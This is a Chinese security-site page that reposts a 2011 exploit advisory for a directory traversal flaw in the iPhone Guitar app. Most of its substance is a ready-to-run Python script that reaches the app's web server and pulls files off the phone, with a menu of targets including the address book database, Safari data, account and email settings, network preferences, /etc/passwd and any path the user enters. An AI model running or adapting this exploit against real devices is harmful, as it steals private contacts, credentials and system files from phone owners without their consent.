首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
iPhone Guitar Directory Traversal
来源:Http://IRCRASH.COM 作者:Fereidani 发布时间:2011-02-25  

----------------------------------------------------------------
Software : iPhone Guitar
Type of vunlnerability : Directory Traversal
Tested On : iPhone 4 (IOS 4.0.1)
Risk of use : High
----------------------------------------------------------------
Program Developer : http://frontierdesign.com/Guitar/
----------------------------------------------------------------
Discovered by : Khashayar Fereidani
Team Website : Http://IRCRASH.COM
Team Members : Khashayar Fereidani - Sina YazdanMehr - Arash Allebrahim
English Forums : Http://IRCRASH.COM/forums/
Email : irancrash [ a t ] gmail [ d o t ] com
Facebook : http://facebook.com/fereidani
----------------------------------------------------------------

Exploit:

#!/usr/bin/python
import urllib2
def urlread(url,file):
 url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
 u = urllib2.urlopen(url)
 localFile = open('result.html', 'w')
 localFile.write(u.read())
 localFile.close()
 print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone Guitar DT                    -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:2112 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
 url='http://'+url
if ((id>0) and (id<6)):
 file=f[id]
 urlread(url,file)
if (id==6):
 file=raw_input("Enter Local File Address : ")
 urlread(url,file)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·iPhone ishred 1.93 Directory T
·iPhone PDF Reader Pro 2.3 Dire
·Elecard MPEG Player 5.7 Local
·Novell Netware RPC XNFS xdrDec
·Victory FTP Server 5.0 Denial
·Edraw Office Viewer Component
·Share v1.0 for iPhone / iPod t
·iPhone Folders 2.5 Directory T
·myDBLite v1.1.10 for iPhone /
·iPhone iFile 2.0 Directory Tra
·iDocManager v1.0.0 for iPhone
·iPhone MyDocs 2.7 Directory Tr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved